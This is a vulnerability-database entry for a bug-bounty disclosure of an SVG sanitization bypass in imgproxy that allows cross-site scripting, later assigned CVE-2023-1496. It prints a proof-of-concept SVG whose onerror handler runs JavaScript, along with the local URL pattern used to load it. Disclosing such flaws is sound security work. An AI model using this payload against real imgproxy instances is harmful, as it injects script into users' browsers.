Lucene search
Emredurmaz4DE603972-935A-401A-96FB-17DDADD282B2HistoryJan 12, 2023 - 8:42 a.m.
SVG Sanitization Bypass - XSS
2023-01-1208:42:25
emredurmaz4
www.huntr.dev
17
imgproxy
application
svg
sanitization
bypass
xss
malicious
file
javascript
proof of concept
bug bounty
0.001 Low
EPSS
Percentile
39.4%
Description
In imgproxy application, we bypassed the svg sanitization function. In this way, attacker can craft malicious svg file and run javascript on the application.
Proof of Concept
Here is the content of the malicious svg file.
<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>
After that you can call this svg file like below.
http://127.0.0.1:8080/unsafe/plain/<svg-file-url>/test.svg
Related
osv
osv
CVE-2023-1496
2023-03-19 17:15:11
imgproxy Cross-site Scripting vulnerability
2023-03-19 18:30:24
nuclei
nuclei
Imgproxy < 3.14.0 - Cross-site Scripting (XSS)
2023-07-01 13:15:49
cvelist
cvelist
CVE-2023-1496 Cross-site Scripting (XSS) - Reflected in imgproxy/imgproxy
2023-03-19 00:00:00
nvd
nvd
CVE-2023-1496
2023-03-19 17:15:11
veracode
veracode
Cross-site Scripting (XSS)
2023-03-22 00:57:23
prion
prion
Cross site scripting
2023-03-19 17:15:00
github
github
imgproxy Cross-site Scripting vulnerability
2023-03-19 18:30:24
cve
cve
CVE-2023-1496
2023-03-19 17:15:11